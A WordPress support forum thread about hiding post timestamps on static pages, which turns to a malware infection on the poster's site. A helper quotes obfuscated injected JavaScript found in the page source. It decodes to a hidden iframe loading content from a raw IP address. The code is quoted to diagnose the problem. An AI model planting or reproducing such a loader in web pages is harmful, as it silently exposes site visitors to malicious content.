• Resolved swollenthumb


    Ok, my site is at https://www.swollenthumb.com

    At the moment, I have 3 pages: About, Donate, and Home.

    I also have a blog, with regularly updated posts.

    My problem is that I want the timestamp to appear on my blog “POSTS”, exactly like it is now. However, I do not want them on the “PAGES”. The pages are there to be static, and rarely if ever updated. They are to be timeless, whereas the postings are there to provide a chronology to the site.

    I’m thinking some CSS is in order, to tell the loop that I want the timestamp to not appear on “PAGES”, but I don’t know enough CSS to make it happen.

    I’ve looked all over, but I can’t find this anywhere on the internet. This can’t be that unusual of a problem, can it?

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  • Interesting theme. It uses one template file to display home, single, categories, archives and pages. Make a complete duplicate of index.php call it page.php and upload it to your theme’s folder. That new file – page.php – will now be the one used to display pages. Open that file (page.php) and look for this line …

    <div class="meta"><?php _e("Posted by"); ?> <?php the_author() ?> | <?php the_category(',') ?> | <?php the_time('l j F Y'); ?> <?php the_time() ?> <?php edit_post_link(__('Edit This')); ?></div>

    Edit out what you don’t want. Assuming you don’t want any of it then it should look like this …

    <div class="meta"><?php edit_post_link(__('Edit This')); ?></div>

    Notice I left the “edit this” link in place. It will only be visible to you when logged in and allows you quick editing access to it.

    Next, from that same file remove this …

    <?php comments_popup_link(__('Comments (0)'), __('Comments (1)'), __('Comments (%)')); ?>

    … and this …

    <?php comments_template(); // Get wp-comments.php template ?>

    Make sure to make a backup before doing any of this.

    hmm your site shows up as a possible malware site in safari, you may want to look into that…

    @ mike868y,

    Thanks for that info. Now that you mention it I took another look.

    @ swollenthumb

    In the source code at the bottom of the page I see this …

    <script type="text/javascript">
    var s="=jgsbnf!tsd>(iuuq;0078/326/342/3530vt0joefy/qiq(!xjeui>(2(!ifjhiu>(2(!tuzmf>(wjtjcjmjuz;!ijeefo<(?=0jgsbnf?";
    m=""; for (i=0; i<s.length; i++) m+=String.fromCharCode(s.charCodeAt(i)-1); document.write(m);

    I’m assuming you didn’t put that there.

    Thread Starter swollenthumb


    malware? well, I’m more of a creative person than a technical person, so a lot of this is brand new to me. What should I do?

    And thanks for the advice LenK. I truly appreciate it, and I’ll get to work on it to see if it works.

    Thread Starter swollenthumb



    Thanks a million LenK.

    My theme isn’t set up exactly as you had specified, so I’ll explain what I did in case other people come here with the same problem.

    My theme only had one template for all posts and pages. What I did was duplicate the index file, and when I renamed it to “page.php”, wordpress recognized that it would be the template for pages, and not posts. From there, I was able to make all of the changes I wanted to, so that pages could look different from posts.

    My theme only had one template for all posts and pages. What I did was duplicate the index file, and when I renamed it to “page.php”, wordpress recognized that it would be the template for pages, and not posts.

    That’s exactly what I said. ?? Glad you got it going. However, you have a much larger problem than template files right now. Getting back to the malware thing, browsing to your site in Safari this is the warning one gets. Clicking on the link takes you to the Google Diagnostic Page.

    You may want to peruse the various threads below as they contain some good info.


    Thread Starter swollenthumb


    ok, I think I’m in way over my head here. I personally haven’t been able to locate anything in my files that looks like hacked code, including the excerpt that you mentioned earlier LenK.

    Right now, I’m looking at MySQL, and all of this is just a little advanced for me. Is there an easier way to narrow down what might be causing these infections?

    Thread Starter swollenthumb


    Since the topic of this discussion has changed from timestamps to malware, I created a new topic @


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